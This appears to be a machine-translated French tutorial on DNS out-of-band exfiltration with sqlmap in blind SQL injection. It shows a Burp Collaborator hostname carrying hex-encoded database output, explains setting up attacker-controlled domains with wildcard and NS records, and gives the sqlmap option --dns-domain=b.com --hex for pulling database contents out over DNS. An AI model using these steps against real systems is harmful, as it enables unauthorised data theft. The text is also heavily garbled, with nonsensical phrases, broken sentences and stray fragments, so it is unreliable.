Il y a trop peu d'articles sur Internet sur l'injection DNS pour sqlmap. Ils ne présentent que brièvement le paramètre --dns-domain. Les articles pratiques pertinents sont soit vagues, soit mentionnés d'un seul coup, ce qui les rend confus (principalement des plats). ), la clé n'est pas encore apportée par le patron). Puis j’ai recommencé en me référant aux méthodes sur Internet.
Les choses qui doivent être préparées sont sqlmap, l'injection aveugle de Windows, deux noms de domaine et un serveur réseau externe.
Une fois, alors que je faisais quelque chose, j'ai rencontré une injection aveugle de temps. Il s'agissait d'une machine Windows et je me suis souvenu de la méthode DNS. injection.
Avant de commencer, je prévois d'utiliser la commande --sql-shell de sqlmap pour tester la charge utile de l'injection DNS
# 🎜 🎜#
Allez d'abord sur le client collaborateur dans burpsuite et copiez le nom de domaine qui nous a été attribué par burpUtilisez sqlmap pour exécuter l'instruction sql#🎜🎜 ## 🎜🎜#
La demande a été reçue dans burpsuite alors que Sqlmap est toujours en cours d'exécution.
352E3 dans 352E3 dans 352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net 62E3134 est le résultat renvoyé après ex. exécution de la version().
Décoder pour obtenir la version de mysql. Eh bien, il n’y a rien de mal avec l’injection DNS à ce stade.
Préparez-vous à configurer deux noms de domaine. Certains articles sur Internet disent qu'un seul est bien, mais cela semble toujours plus gênant. De nombreux fournisseurs de serveurs de noms de domaine ne proposent pas certaines fonctions avancées, il est donc plus facile de le faire. préparez-en deux.
www.a.com www.b.comNous configurons d'abord le nom de domaine a-> # Ajoutez simplement * pour effectuer une analyse panoramique et pointez vers l'IP de notre serveur réseau externe. Configurons notre nom de domaine b->b.com C'est encore plus simple, il suffit de modifier le nom de domaine directement Pour le DNS, remplissez simplement ns1.a.com ns2.a.com Vous n’avez rien d’autre à faire. Attendez ensuite que le nom de domaine prenne effet. Nous allons sur le serveur du réseau externe pour tester si l'analyse est réussie #Ensuite, la machine locale envoie un ping à hello.b.com et l'envoie au serveur externe. la demande de hello.b.com et la machine locale indique que l'hôte est introuvable. Ne vous inquiétez pas, car aucune résolution n'est définie. Maintenant que tout est configuré, nous pouvons utiliser sqlmap pour l'injection DNS.
Ajoutez simplement le paramètre --dns-domain=b.com --hex à Sqlmap À cette étape, sqlmap restera bloqué et vous demandera de configurer une instance de serveur DNSDirect ctrl+c
#🎜 🎜# Invite indiquant que la récupération des données via le canal DNS a réussi.
La vitesse d'injection est aussi rapide que le rapport d'erreurs et l'union, vous n'avez donc plus à supporter la vitesse lente.Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!